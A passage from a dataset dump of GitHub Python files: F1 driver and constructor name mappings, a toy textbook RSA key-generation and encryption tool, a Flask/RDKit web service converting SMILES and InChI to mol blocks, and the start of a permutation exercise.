Bonetto',\r\n 'cruz' : 'Adolfo Cruz',\r\n 'nalon' : 'Duke Nalon',\r\n 'scarborough' : 'Carl Scarborough',\r\n 'holland' : 'Bill Holland',\r\n 'bob_scott' : 'Bob Scott',\r\n 'legat' : 'Arthur Legat',\r\n 'cabantous' : 'Yves Cabantous',\r\n 'crook' : 'Tony Crook',\r\n 'jimmy_stewart' : 'Jimmy Stewart',\r\n 'ian_stewart' : 'Ian Stewart',\r\n 'duncan_hamilton' : 'Duncan Hamilton',\r\n 'klodwig' : 'Ernst Klodwig',\r\n 'krause' : 'Rudolf Krause',\r\n 'karch' : 'Oswald Karch',\r\n 'heeks' : 'Willi Heeks',\r\n 'fitzau' : 'Theo Fitzau',\r\n 'adolff' : 'Kurt Adolff',\r\n 'bechem' : 'Gunther Bechem',\r\n 'bauer' : 'Erwin Bauer',\r\n 'hans_stuck' : 'Hans von Stuck',\r\n 'loof' : 'Ernst Loof',\r\n 'scherrer' : 'Albert Scherrer',\r\n 'terra' : 'Max de Terra',\r\n 'hirt' : 'Peter Hirt',\r\n 'carini' : 'Piero Carini',\r\n 'fischer' : 'Rudi Fischer',\r\n 'ulmen' : 'Toni Ulmen',\r\n 'abecassis' : 'George Abecassis',\r\n 'george_connor' : 'George Connor',\r\n 'rigsby' : 'Jim Rigsby',\r\n 'james' : 'Joe James',\r\n 'schindler' : 'Bill Schindler',\r\n 'fonder' : 'George Fonder',\r\n 'banks' : 'Henry Banks',\r\n 'mcdowell' : 'Johnny McDowell',\r\n 'miller' : 'Chet Miller',\r\n 'ball' : 'Bobby Ball',\r\n 'tornaco' : 'Charles de Tornaco',\r\n 'laurent' : 'Roger Laurent',\r\n 'obrien' : 'Robert O\\'Brien',\r\n 'gaze' : 'Tony Gaze',\r\n 'charrington' : 'Robin Montgomerie-Charrington',\r\n 'comotti' : 'Franco Comotti',\r\n 'etancelin' : 'Philippe etancelin',\r\n 'poore' : 'Dennis Poore',\r\n 'thompson' : 'Eric Thompson',\r\n 'downing' : 'Ken Downing',\r\n 'graham_whitehead' : 'Graham Whitehead',\r\n 'bianco' : 'Gino Bianco',\r\n 'murray' : 'David Murray',\r\n 'cantoni' : 'Eitel Cantoni',\r\n 'aston' : 'Bill Aston',\r\n 'brudes' : 'Adolf Brudes',\r\n 'riess' : 'Fritz Riess',\r\n 'niedermayr' : 'Helmut Niedermayr',\r\n 'klenk' : 'Hans Klenk',\r\n 'balsa' : 'Marcel Balsa',\r\n 'schoeller' : 'Rudolf Schoeller',\r\n 'pietsch' : 'Paul Pietsch',\r\n 'peters' : 'Josef Peters',\r\n 'lof' : 'Dries van der Lof',\r\n 'flinterman' : 'Jan Flinterman',\r\n 'dusio' : 'Piero Dusio',\r\n 'crespo' : 'Alberto Crespo',\r\n 'rol' : 'Franco Rol',\r\n 'sanesi' : 'Consalvo Sanesi',\r\n 'guy_mairesse' : 'Guy Mairesse',\r\n 'louveau' : 'Henri Louveau',\r\n 'wallard' : 'Lee Wallard',\r\n 'forberg' : 'Carl Forberg',\r\n 'rose' : 'Mauri Rose',\r\n 'mackey' : 'Bill Mackey',\r\n 'green' : 'Cecil Green',\r\n 'walt_brown' : 'Walt Brown',\r\n 'hellings' : 'Mack Hellings',\r\n 'levegh' : 'Pierre Levegh',\r\n 'chaboud' : 'Eugene Chaboud',\r\n 'gordini' : 'Aldo Gordini',\r\n 'kelly' : 'Joe Kelly',\r\n 'parker' : 'Philip Fotheringham-Parker',\r\n 'shawe_taylor' : 'Brian Shawe Taylor',\r\n 'john_james' : 'John James',\r\n 'branca' : 'Toni Branca',\r\n 'richardson' : 'Ken Richardson',\r\n 'jover' : 'Juan Jover',\r\n 'grignard' : 'Georges Grignard',\r\n 'hampshire' : 'David Hampshire',\r\n 'crossley' : 'Geoff Crossley',\r\n 'fagioli' : 'Luigi Fagioli',\r\n 'harrison' : 'Cuth Harrison',\r\n 'fry' : 'Joe Fry',\r\n 'martin' : 'Eugene Martin',\r\n 'leslie_johnson' : 'Leslie Johnson',\r\n 'biondetti' : 'Clemente Biondetti',\r\n 'pian' : 'Alfredo Pian',\r\n 'sommer' : 'Raymond Sommer',\r\n 'chitwood' : 'Joie Chitwood',\r\n 'fohr' : 'Myron Fohr',\r\n 'ader' : 'Walt Ader',\r\n 'holmes' : 'Jackie Holmes',\r\n 'levrett' : 'Bayliss Levrett',\r\n 'jackson' : 'Jimmy Jackson',\r\n 'pagani' : 'Nello Pagani',\r\n 'pozzi' : 'Charles Pozzi',\r\n 'serafini' : 'Dorino Serafini',\r\n 'cantrell' : 'Bill Cantrell',\r\n 'mantz' : 'Johnny Mantz',\r\n 'kladis' : 'Danny Kladis',\r\n 'oscar_gonzalez' : 'Oscar Gonzalez',\r\n 'hulkenberg' : 'Nico Hulkenberg',\r\n 'petrov' : 'Vitaly Petrov',\r\n 'lopez' : 'Jose Maria Lopez',\r\n 'grassi' : 'Lucas di Grassi',\r\n 'bruno_senna' : 'Bruno Senna',\r\n 'chandhok' : 'Karun Chandhok',\r\n 'maldonado' : 'Pastor Maldonado',\r\n 'resta' : 'Paul di Resta',\r\n 'perez' : 'Sergio Perez',\r\n 'ambrosio' : 'Jerome d\\'Ambrosio',\r\n 'ricciardo' : 'Daniel Ricciardo',\r\n 'vergne' : 'Jean-eric Vergne',\r\n 'pic' : 'Charles Pic',\r\n 'chilton' : 'Max Chilton',\r\n 'gutierrez' : 'Esteban Gutierrez',\r\n 'bottas' : 'Valtteri Bottas',\r\n 'garde' : 'Giedo van der Garde',\r\n 'jules_bianchi' : 'Jules Bianchi',\r\n 'kevin_magnussen' : 'Kevin Magnussen',\r\n 'kvyat' : 'Daniil Kvyat',\r\n 'lotterer' : 'Andre Lotterer',\r\n 'ericsson' : 'Marcus Ericsson',\r\n 'stevens' : 'Will Stevens',\r\n 'max_verstappen' : 'Max Verstappen',\r\n 'nasr' : 'Felipe Nasr',\r\n 'sainz' : 'Carlos Sainz',\r\n 'merhi' : 'Roberto Merhi',\r\n 'rossi' : 'Alexander Rossi',\r\n 'jolyon_palmer' : 'Jolyon Palmer',\r\n 'wehrlein' : 'Pascal Wehrlein',\r\n 'haryanto' : 'Rio Haryanto',\r\n 'vandoorne' : 'Stoffel Vandoorne',\r\n 'ocon' : 'Esteban Ocon',\r\n 'leclerc' : 'Charles Leclerc',\r\n 'gasly' : 'Pierre Gasly',\r\n 'norris' : 'Lando Norris',\r\n 'giovinazzi' : 'Antonio Giovinazzi',\r\n 'latifi' : 'Nicholas Latifi',\r\n 'albon' : 'Alexander Albon',\r\n 'russel' : 'George Russell',\r\n 'stroll' : 'Lance Stroll',\r\n 'tsunoda' : 'Yuki Tsunoda',\r\n 'mick_schumacher' : 'Mick Schumacher',\r\n 'mazepin' : 'Nikita Mazepin'\r\n }\r\n\r\nconstuctor_mapping = {'mclaren' : 'McLaren',\r\n 'bmw_sauber' : 'BMW Sauber',\r\n 'williams' : 'Williams',\r\n 'renault' : 'Renault',\r\n 'toro_rosso' : 'Toro Rosso',\r\n 'ferrari' : 'Ferrari',\r\n 'toyota' : 'Toyota',\r\n 'super_aguri' : 'Super Aguri',\r\n 'red_bull' : 'Red Bull',\r\n 'force_india' : 'Force India',\r\n 'honda' : 'Honda',\r\n 'spyker' : 'Spyker',\r\n 'mf1' : 'MF1',\r\n 'spyker_mf1' : 'Spyker MF1',\r\n 'sauber' : 'Sauber',\r\n 'bar' : 'BAR',\r\n 'jordan' : 'Jordan',\r\n 'minardi' : 'Minardi',\r\n 'jaguar' : 'Jaguar',\r\n 'prost' : 'Prost',\r\n 'arrows' : 'Arrows',\r\n 'benetton' : 'Benetton',\r\n 'brawn' : 'Brawn',\r\n 'stewart' : 'Stewart',\r\n 'tyrrell' : 'Tyrrell',\r\n 'lola' : 'Lola',\r\n 'ligier' : 'Ligier',\r\n 'forti' : 'Forti',\r\n 'footwork' : 'Footwork',\r\n 'pacific' : 'Pacific',\r\n 'simtek' : 'Simtek',\r\n 'team_lotus' : 'Team Lotus',\r\n 'larrousse' : 'Larrousse',\r\n 'brabham' : 'Brabham',\r\n 'dallara' : 'Dallara',\r\n 'fondmetal' : 'Fondmetal',\r\n 'march' : 'March',\r\n 'moda' : 'Andrea Moda',\r\n 'ags' : 'AGS',\r\n 'lambo' : 'Lambo',\r\n 'leyton' : 'Leyton House',\r\n 'coloni' : 'Coloni',\r\n 'eurobrun' : 'Euro Brun',\r\n 'osella' : 'Osella',\r\n 'onyx' : 'Onyx',\r\n 'life' : 'Life',\r\n 'rial' : 'Rial',\r\n 'zakspeed' : 'Zakspeed',\r\n 'ram' : 'RAM',\r\n 'alfa' : 'Alfa Romeo',\r\n 'spirit' : 'Spirit',\r\n 'toleman' : 'Toleman',\r\n 'ats' : 'ATS',\r\n 'theodore' : 'Theodore',\r\n 'fittipaldi' : 'Fittipaldi',\r\n 'ensign' : 'Ensign',\r\n 'shadow' : 'Shadow',\r\n 'wolf' : 'Wolf',\r\n 'merzario' : 'Merzario',\r\n 'kauhsen' : 'Kauhsen',\r\n 'rebaque' : 'Rebaque',\r\n 'surtees' : 'Surtees',\r\n 'hesketh' : 'Hesketh',\r\n 'martini' : 'Martini',\r\n 'brm' : 'BRM',\r\n 'penske' : 'Penske',\r\n 'lec' : 'LEC',\r\n 'mcguire' : 'McGuire',\r\n 'boro' : 'Boro',\r\n 'apollon' : 'Apollon',\r\n 'kojima' : 'Kojima',\r\n 'parnelli' : 'Parnelli',\r\n 'maki' : 'Maki',\r\n 'hill' : 'Embassy Hill',\r\n 'lyncar' : 'Lyncar',\r\n 'trojan' : 'Trojan',\r\n 'amon' : 'Amon',\r\n 'token' : 'Token',\r\n 'iso_marlboro' : 'Iso Marlboro',\r\n 'tecno' : 'Tecno',\r\n 'matra' : 'Matra',\r\n 'politoys' : 'Politoys',\r\n 'connew' : 'Connew',\r\n 'bellasi' : 'Bellasi',\r\n 'tomaso' : 'De Tomaso',\r\n 'cooper' : 'Cooper',\r\n 'eagle' : 'Eagle',\r\n 'lds' : 'LDS',\r\n 'protos' : 'Protos',\r\n 'shannon' : 'Shannon',\r\n 'scirocco' : 'Scirocco',\r\n 're' : 'RE',\r\n 'brp' : 'BRP',\r\n 'porsche' : 'Porsche',\r\n 'derrington' : 'Derrington',\r\n 'gilby' : 'Gilby',\r\n 'stebro' : 'Stebro',\r\n 'emeryson' : 'Emeryson',\r\n 'enb' : 'ENB',\r\n 'jbw' : 'JBW',\r\n 'ferguson' : 'Ferguson',\r\n 'mbm' : 'MBM',\r\n 'behra-porsche' : 'Behra-Porsche',\r\n 'maserati' : 'Maserati',\r\n 'scarab' : 'Scarab',\r\n 'watson' : 'Watson',\r\n 'epperly' : 'Epperly',\r\n 'phillips' : 'Phillips',\r\n 'lesovsky' : 'Lesovsky',\r\n 'trevis' : 'Trevis',\r\n 'meskowski' : 'Meskowski',\r\n 'kurtis_kraft' : 'Kurtis Kraft',\r\n 'kuzma' : 'Kuzma',\r\n 'vhristensen' : 'Christensen',\r\n 'ewing' : 'Ewing',\r\n 'aston_martin' : 'Aston Martin',\r\n 'vanwall' : 'Vanwall',\r\n 'moore' : 'Moore',\r\n 'dunn' : 'Dunn',\r\n 'elder' : 'Elder',\r\n 'sutton' : 'Sutton',\r\n 'fry' : 'Fry',\r\n 'tec-mec' : 'Tec-Mec',\r\n 'connaught' : 'Connaught',\r\n 'alta' : 'Alta',\r\n 'osca' : 'OSCA',\r\n 'gordini' : 'Gordini',\r\n 'stevens' : 'Stevens',\r\n 'bugatti' : 'Bugatti',\r\n 'mercedes' : 'Mercedes',\r\n 'lancia' : 'Lancia',\r\n 'hwm' : 'HWM',\r\n 'schroeder' : 'Schroeder',\r\n 'pawl' : 'Pawl',\r\n 'pankratz' : 'Pankratz',\r\n 'arzani-volpini' : 'Arzani-Volpini',\r\n 'nichels' : 'Nichels',\r\n 'bromme' : 'Bromme',\r\n 'klenk' : 'Klenk',\r\n 'simca' : 'Simca',\r\n 'turner' : 'Turner',\r\n 'del_roy' : 'Del Roy',\r\n 'veritas' : 'Veritas',\r\n 'bmw' : 'BMW',\r\n 'emw' : 'EMW',\r\n 'afm' : 'AFM',\r\n 'frazer_nash' : 'Frazer Nash',\r\n 'sherman' : 'Sherman',\r\n 'deidt' : 'Deidt',\r\n 'era' : 'ERA',\r\n 'butterworth' : 'Aston Butterworth',\r\n 'cisitalia' : 'Cisitalia',\r\n 'lago' : 'Talbot-Lago',\r\n 'hall' : 'Hall',\r\n 'marchese' : 'Marchese',\r\n 'langley' : 'Langley',\r\n 'rae' : 'Rae',\r\n 'olson' : 'Olson',\r\n 'wetteroth' : 'Wetteroth',\r\n 'adams' : 'Adams',\r\n 'snowberger' : 'Snowberger',\r\n 'milano' : 'Milano',\r\n 'hrt' : 'HRT',\r\n 'virgin' : 'Virgin',\r\n 'cooper-maserati' : 'Cooper-Maserati',\r\n 'cooper-osca' : 'Cooper-OSCA',\r\n 'cooper-borgward' : 'Cooper-Borgward',\r\n 'cooper-climax' : 'Cooper-Climax',\r\n 'cooper-castellotti' : 'Cooper-Castellotti',\r\n 'lotus-climax' : 'Lotus-Climax',\r\n 'lotus-maserati' : 'Lotus-Maserati',\r\n 'de_tomaso-osca' : 'De Tomaso-Osca',\r\n 'de_tomaso-alfa_romeo' : 'De Tomaso-Alfa Romeo',\r\n 'lotus-brm' : 'Lotus-BRM',\r\n 'lotus-borgward' : 'Lotus-Borgward',\r\n 'cooper-alfa_romeo' : 'Cooper-Alfa Romeo',\r\n 'de_tomaso-ferrari' : 'De Tomaso-Ferrari',\r\n 'lotus-ford' : 'Lotus-Ford',\r\n 'brabham-brm' : 'Brabham-BRM',\r\n 'brabham-ford' : 'Brabham-Ford',\r\n 'brabham-climax' : 'Brabham-Climax',\r\n 'lds-climax' : 'LDS-Climax',\r\n 'lds-alfa_romeo' : 'LDS-Alfa Romeo',\r\n 'cooper-ford' : 'Cooper-Ford',\r\n 'mclaren-ford' : 'McLaren-Ford',\r\n 'mclaren-seren' : 'McLaren-Serenissima',\r\n 'eagle-climax' : 'Eagle-Climax',\r\n 'eagle-weslake' : 'Eagle-Weslake',\r\n 'brabham-repco' : 'Brabham-Repco',\r\n 'cooper-ferrari' : 'Cooper-Ferrari',\r\n 'cooper-ats' : 'Cooper-ATS',\r\n 'mclaren-brm' : 'McLaren-BRM',\r\n 'cooper-brm' : 'Cooper-BRM',\r\n 'matra-ford' : 'Matra-Ford',\r\n 'brm-ford' : 'BRM-Ford',\r\n 'mclaren-alfa_romeo' : 'McLaren-Alfa Romeo',\r\n 'march-alfa_romeo' : 'March-Alfa Romeo',\r\n 'march-ford' : 'March-Ford',\r\n 'lotus-pw' : 'Lotus-Pratt & Whitney',\r\n 'shadow-ford' : 'Shadow-Ford',\r\n 'shadow-matra' : 'Shadow-Matra',\r\n 'brabham-alfa_romeo' : 'Brabham-Alfa Romeo',\r\n 'lotus_racing' : 'Lotus',\r\n 'marussia' : 'Marussia',\r\n 'caterham' : 'Caterham',\r\n 'lotus_f1' : 'Lotus F1',\r\n 'manor' : 'Manor Marussia',\r\n 'haas' : 'Haas F1 Team',\r\n 'alphatauri' : 'AlphaTauri',\r\n 'aston_martin' : \"Aston Martin\",\r\n 'alpine' : 'Alpine',\r\n 'racing_point' : 'Racing Point'\r\n }\r\n\r\nfinishing_statuses = {'disqualified' : 'disqualification',\r\n 'accident' : 'an accident',\r\n 'collision' : 'a collision',\r\n 'engine' : 'an engine problem',\r\n 'gearbox' : 'a gearbox problem',\r\n 'transmission' : 'a transmission issue',\r\n 'clutch' : 'a clutch issue',\r\n 'hydraulics' : 'a hydraulics problem',\r\n 'electrical' : 'an electrical problem',\r\n 'spun off' : 'spuning off',\r\n 'radiator' : 'a radiator issue',\r\n 'suspension' : 'a suspension problem',\r\n 'brakes' : 'a brakes problem',\r\n 'differential' : 'a differential issue',\r\n 'overheating' : 'an overheating issue',\r\n 'mechanical' : 'a mechanical problem',\r\n 'tyre' : 'a tyre issue',\r\n 'driver seat' : 'a driver seat issue',\r\n 'puncture' : 'a puncture',\r\n 'driveshaft' : 'a driveshaft problem',\r\n 'retired' : 'unknown reasons',\r\n 'fuel pressure' : 'a fuel pressure problem',\r\n 'front wing' : 'a front wing issue',\r\n 'water pressure' : 'a water pressure problem',\r\n 'refuelling' : 'a refuelling problem',\r\n 'wheel' : 'a wheel glitch',\r\n 'throttle' : 'a throttle problem',\r\n 'steering' : 'a steering issue',\r\n 'technical' : 'a technical problem',\r\n 'electronics' : 'an electronics problem',\r\n 'broken wing' : 'a broken wing',\r\n 'heat shield fire' : 'a heat shield fire problem',\r\n 'exhaust' : 'an exhaust issue',\r\n 'oil leak' : 'an oil leak',\r\n 'wheel rim' : 'a wheel rim problem',\r\n 'water leak' : 'a water leak',\r\n 'fuel pump' : 'a fuel pump issue',\r\n 'track rod' : 'a track rod issue',\r\n 'oil pressure' : 'an oil pressure problem',\r\n 'withdrew' : 'withdrawal',\r\n 'engine fire' : 'an engine fire',\r\n 'tyre puncture' : 'a tyre puncture',\r\n 'out of fuel' : 'remaining out of fuel',\r\n 'wheel nut' : 'a wheel nut problem',\r\n 'not classified' : 'not being classified',\r\n 'pneumatics' : 'a pneumatics problem',\r\n 'handling' : 'a handling problem',\r\n 'rear wing' : 'a rear wing issue',\r\n 'fire' : 'a fire',\r\n 'wheel bearing' : 'a wheel bearing problem',\r\n 'physical' : 'a physical problem',\r\n 'fuel system' : 'a fuel system issue',\r\n 'oil line' : 'an oil line issue',\r\n 'fuel rig' : 'a fuel rig issue',\r\n 'launch control' : 'a launch control issue',\r\n 'injured' : 'an injury',\r\n 'fuel' : 'a fuel problem',\r\n 'power loss' : 'a power loss problem',\r\n 'vibrations' : 'increased vibrations',\r\n '107% rule' : 'the 107% rule',\r\n 'safety' : 'a safety problem',\r\n 'drivetrain' : 'a drivetrain problem',\r\n 'ignition' : 'an ignition issue',\r\n 'did not qualify' : 'not qualifying',\r\n 'injury' : 'an injury',\r\n 'chassis' : 'a chassis issue',\r\n 'battery' : 'a battery issue',\r\n 'stalled' : 'a stalled engine',\r\n 'halfshaft' : 'a halfshaft issue',\r\n 'crankshaft' : 'a crankshaft problem',\r\n 'safety concerns' : 'safety concerns',\r\n 'not restarted' : 'not restarting',\r\n 'alternator' : 'an alternator problem',\r\n 'underweight' : 'being underweight',\r\n 'safety belt' : 'a safety belt issue',\r\n 'oil pump' : 'an oil pump issue',\r\n 'fuel leak' : 'a fuel leak problem',\r\n 'excluded' : 'being excluded',\r\n 'did not prequalify' : 'not prequalifying',\r\n 'injection' : 'an injection issue',\r\n 'distributor' : 'a distributor issue',\r\n 'driver unwell' : 'being unwell',\r\n 'turbo' : 'a turbo problem',\r\n 'cv joint' : 'a cv joint problem',\r\n 'water pump' : 'a water pump problem',\r\n 'fatal accident' : 'a fatal accident',\r\n 'spark plugs' : 'a spark plugs issue',\r\n 'fuel pipe' : 'a fuel pipe problem',\r\n 'eye injury' : 'an eye injury',\r\n 'oil pipe' : 'an oil pipe problem',\r\n 'axle' : 'an axle issue',\r\n 'water pipe' : 'a water pipe issue',\r\n 'magneto' : 'a magneto issue',\r\n 'supercharger' : 'a supercharger problem',\r\n 'engine misfire' : 'engine misfiring',\r\n 'collision damage' : 'collision damage',\r\n 'power unit' : 'a power unit issue',\r\n 'ers' : 'an ers problem',\r\n 'brake duct' : 'a brake duct issue',\r\n\r\n }","repo_name":"ZX10Tomcat/f1ChatBot","sub_path":"mappings.py","file_name":"mappings.py","file_ext":"py","file_size_in_byte":54243,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19665835385","text":"#NTLO\nclass RSA_System:\n\n def __init__(self, primes):\n self.p, self.q = primes[0], primes[1]\n self.n = primes[0] * primes[1]\n self.phi = (self.p - 1) * (self.q - 1)\n\n def display(self):\n print('New RSA scheme created:')\n print('Primes: ' + str(self.p) + ', ' + str(self.q))\n print('Modulus: ' + str(self.n))\n print('Phi(n): ' + str(self.phi))\n print('Public exponent: ' + str(self.b) + '\\nPrivate exponent: ' + str(self.a))\n\n def Encrypt(self, msg):\n unreduced_e = msg ** self.b\n e = unreduced_e % self.n\n\n return e\n\n def Decrypt(self, msg, a):\n unreduced_d = msg ** a\n d = unreduced_d % self.n\n\n return d\n \n def EEA(self, b):\n #print(\"Running EEA\")\n\n q_list = []\n\n o = self.phi\n m = b\n \n #r_vals = []\n t_i = 0\n t_ii = 1\n \n reduce = True\n while(reduce):\n #r_vals.append(m)\n q = int(o / m)\n t_new = t_i - t_ii*q\n t_i = t_ii\n t_ii = t_new\n \n holder = m\n m = o % m\n o = holder\n\n if((o % m) == 0):\n reduce = False\n\n #print(\"GCD: \" + str(m))\n #print(t_ii)\n #print(r_vals)\n\n if(m == 1):\n #print(\"Valid b\")\n self.b = b\n #GENERATE A\n\n a = t_ii\n \n if(a < 0):\n a = a + self.phi\n \n #prod = a * b\n #print(prod % self.phi)\n\n self.a = a\n\n return True\n else:\n print(\"Entered number not relatively prime to \" + str(self.phi))\n return False\n \n\n\nclass SimulatedScheme:\n\n def __init__(self, specs):\n self.n = specs['modulus']\n try:\n self.b = specs['public exponent']\n except:\n pass\n \n \n def Encrypt(self, msg):\n unreduced_e = msg ** self.b\n e = unreduced_e % self.n\n \n return e\n\n def Decrypt(self, msg, a):\n unreduced_d = msg ** a\n d = unreduced_d % self.n\n\n return d\n \n\n\n\n\ndef createSystem():\n \n primes = getPrimes()\n\n cryptosystem = RSA_System(primes)\n\n getExponents(cryptosystem)\n \n #print(primes)\n #print(n)\n\n return cryptosystem\n\n\n\ndef getExponents(s):\n\n b_str = input('\\nEnter a relatively prime integer, mod ' + str(s.phi) + ', for an encryption exponent:\\n')\n\n try:\n b = int(b_str)\n\n valid_b = s.EEA(b)\n\n if not valid_b:\n getExponents(s)\n \n except:\n print('Invalid value entered for b.')\n getExponents(s)\n \n\n\ndef getPrimes():\n primes = input('Enter values for prime numbers p,q:\\n')\n\n primes = primes.split()\n\n p_list = []\n for i in primes:\n try:\n new_p = int(i)\n #ADD PRIMALITY TEST\n prime = testPrimality(new_p)\n if(prime):\n p_list.append(new_p)\n else:\n print(\"Composite integer entered.\")\n p_list = getPrimes()\n break\n \n except:\n print('Non-numerical value entered.')\n\n p_list = getPrimes()\n\n return p_list\n\n\ndef useScheme(cs, mode):\n #mode = input('Encrypt or decrypt a new integer (E or D)\\n')\n #print(\"\\n\")\n\n if(mode == \"E\"):\n plaintext = input('\\nEnter plaintext integer to be encrypted: ')\n try:\n msg = int(plaintext)\n encryptedmsg = cs.Encrypt(msg)\n\n print('Encrypted form of message: ' + str(encryptedmsg))\n except:\n print('Invalid plaintext entered. Try again.')\n useScheme(cs, mode)\n elif(mode == \"D\"):\n e_plaintext = input('\\nEnter encrypted message to be decrypted: ')\n try:\n e_msg = int(e_plaintext)\n\n a = getInt(\"private exponent\")\n \n msg = cs.Decrypt(e_msg, a)\n\n print('Encrypted form of message: ' + str(msg))\n except:\n print('Invalid plaintext entered. Try again.')\n useScheme(cs, mode)\n \n\n\ndef getRSASpecs(m):\n print(\"\\nEnter specifications of RSA system\")\n\n if(m == \"E\"):\n specs = {'modulus': 0, 'public exponent': 1}\n elif(m == \"D\"):\n specs = {'modulus': 0}\n \n for t in specs.keys():\n newEntry = getInt(t)\n specs[t] = newEntry\n\n print(\"System instantiated.\")\n return specs\n\n\ndef getInt(title):\n\n int_str = input(\"Enter integer value for \" + title + \": \")\n\n int_rtrn = 0\n try:\n int_rtrn = int(int_str)\n except:\n print(\"Invalid entry value\")\n\n return int_rtrn\n\n\ndef testPrimality(n):\n\n isPrime = True\n\n sq = int(n**1/2)\n\n for i in range(2, (sq+1)):\n\n fac = n / i\n if(fac == int(fac) and fac != 1):\n isPrime = False\n break\n\n return isPrime\n\n\n\ndef run():\n r = input(\"Select a mode: G - generate, E - encrypt, D - decrypt. \\n\")\n #print(\"\\n\")\n \n if(r.upper() == \"G\"):\n print(\"Generating new RSA cryptosystem... \\n\")\n cs = createSystem()\n print(\"\\n\")\n\n cs.display()\n \n elif(r.upper() == \"E\" or r.upper() == \"D\"):\n #print(\"\\n\")\n specs = getRSASpecs(r.upper())\n\n sim = SimulatedScheme(specs)\n\n useScheme(sim, r.upper())\n\n print(\"\\n\\n\")\n \n run()\n\n \n\nrun()\n\n\n\n#cs = RSA_system([7, 13])\n#cs.EEA(11)\n\n","repo_name":"EnCue/rsa-app","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9829320500","text":"from flask import Flask, render_template, request, send_from_directory, redirect, url_for, jsonify\nfrom flask_cors import CORS, cross_origin\nimport os\napp = Flask(__name__, static_url_path='/static')\n#app.config[\"CORS_HEADERS\"] = \"Content-Type\"\n#pip install -U flask-cors and use to allow AJAX cross-origin request support\nCORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\nfrom rdkit import Chem\n\nhomeRoute = \"/fragview\"\n\n@app.route(homeRoute+'/', methods=['GET'])\n#@cross_origin()\ndef root():\n #return render_template('index.html')\n return render_template('index.html')\n\n#This code lines solve 404 NOT FOUND issues related to JSmol files\n#WARNING: send_static_file is a security concern with user input\n#Maybe needs to find other ways later or we don't need this once our app runs on server.\n@app.route('/<path:path>')\n#@cross_origin()\ndef static_file(path):\n return app.send_static_file(path)\n\n\n@app.route(homeRoute+'/2d', methods=['POST'])\n#@cross_origin()\ndef two_dimensional():\n content = request.get_json() \n smiles = content['smiles']\n\n if not smiles:\n return jsonify({ \"error\": \"No smiles provided\" }), 400\n \n #print(smiles)\n output = []\n for s in smiles:\n m = Chem.MolFromSmiles(s)\n if m:\n output.append(Chem.MolToMolBlock(m))\n else:\n return jsonify({ \"error\": f\"Unable to generate mol from smile: {s}\" }), 400\n\n return jsonify({ \"output\": output })\n\n@app.route(homeRoute+'/2dSingle', methods=[\"POST\"])\ndef single_two_dimensional():\n content = request.get_json()\n smile = content['smile']\n\n if(smile.find('.') and len(smile.split('.')) > 30):\n return jsonify({ \"error\": \"No more than 30 fragments can be parsed at a single time\" }), 400\n\n output = []\n\n if(smile):\n m = Chem.MolFromSmiles(smile)\n if m:\n output.append(Chem.MolToMolBlock(m))\n else:\n return jsonify({ \"error\": f\"Unable to generate mol from smile: {smile}\" }), 400\n else:\n return jsonify({ \"error\": \"No smiles provided\" }), 400\n return jsonify({ \"output\": output })\n\n@app.route(homeRoute+'/2dInchi', methods=[\"POST\"])\ndef inchi_two_dimensional():\n content = request.get_json()\n inchi = content[\"inchi\"]\n output = []\n if(inchi):\n molecule = Chem.MolFromInchi(inchi)\n if(molecule):\n output.append(Chem.MolToMolBlock(molecule))\n output.append(Chem.MolToSmiles(molecule))\n else:\n return jsonify({ \"error\": f\"Unable to generate mol from inchi: {inchi}\" }), 400\n # if(inchi.find('.')):\n # if(len(inchi.split('.')) <= 30):\n # smiles = []\n # for frag in inchi.split('.'):\n # if(\"InChI\" in frag):\n # molecule = Chem.MolFromInchi(frag)\n # smiles.append(Chem.MolToSmiles(molecule))\n # #frag is actually a smile and not InChI\n # else:\n # smiles.append(frag)\n # smile = '.'.join(smiles)\n # molecule = Chem.MolFromSmiles(smile)\n # output.append(Chem.MolToMolBlock(molecule))\n # output.append(smile)\n # return jsonify({ \"output\": output })\n # else:\n # return jsonify({ \"error\": \"No more than 30 fragments can be parsed at a single time\" }), 400\n # else: \n # molecule = Chem.MolFromInchi(inchi)\n # if(molecule):\n # output.append(Chem.MolToMolBlock(molecule))\n # output.append(Chem.MolToSmiles(molecule))\n # else:\n # return jsonify({ \"error\": f\"Unable to generate mol from inchi: {inchi}\" }), 400\n else:\n return jsonify({ \"error\": \"No inchi provided\" }), 400\n return jsonify({ \"output\": output })\n\n@app.route(homeRoute+'/2dMol')\ndef two_dimensionalMol():\n smile = request.args.get('smile', 0, str)\n if(len(smile) > 0):\n if(smile.find('.') != -1):\n smile = smile.split('.')\n molFiles = {}\n i = 0\n for smle in smile:\n m = Chem.MolFromSmiles(smle)\n mol_string = Chem.MolToMolBlock(m)\n molFiles['mol' + str(i)] = mol_string\n i += 1\n #Return a JSONified object, not a list\n return(jsonify(mol2D=molFiles), 200, {'Content-Type': 'text/plain'})\n\n@app.route(homeRoute+'/licenses')\ndef loadLicense():\n return render_template('licenses.html')\n\n@app.route(homeRoute+'/terms')\ndef loadTerms():\n return render_template('terms.html')\n\n@app.route(homeRoute+'/manual')\ndef loadManual():\n return render_template('manual.html')\n\nif(__name__ == \"__main__\"):\n app.run(host='0.0.0.0')\n\n# @app.route('/favicon.ico')\n# def faviconRet():\n# print(os.path.join(app.root_path, 'static/img'))\n# return send_from_directory(os.path.join(app.root_path, 'static/img'), 'favicon-32x32.png')\n \n\n #m = Chem.MolFromSmiles(smile)\n #mol_string = Chem.MolToMolBlock(m)\n #return mol_string, 200, {'Content-Type': 'text/plain'}\n","repo_name":"SpencerArnold2/FragView","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5684186586","text":"import itertools\n\n\ndef solution(data):\n result = []\n prev = []\n\n def dfs(elements):\n # elements의 len이 0이면 순환 종료.\n if len(elements) == 0:\n result.append(prev[:])\n # 요소를 하나하나 추가시킴.\n for e in elements:\n # ele 복사\n next = elements[:]\n # next에서 e를 빼고 prev에 넣음.\n next.remove(e)\n prev.append(e)\n # 순환호출\n dfs(next)\n # 순환호출이 끝나면 prev를 pop시켜 다음 작업 준비.\n prev.pop()\n\n dfs(data)\n return result\n\n\ndef solution2(data):\n return 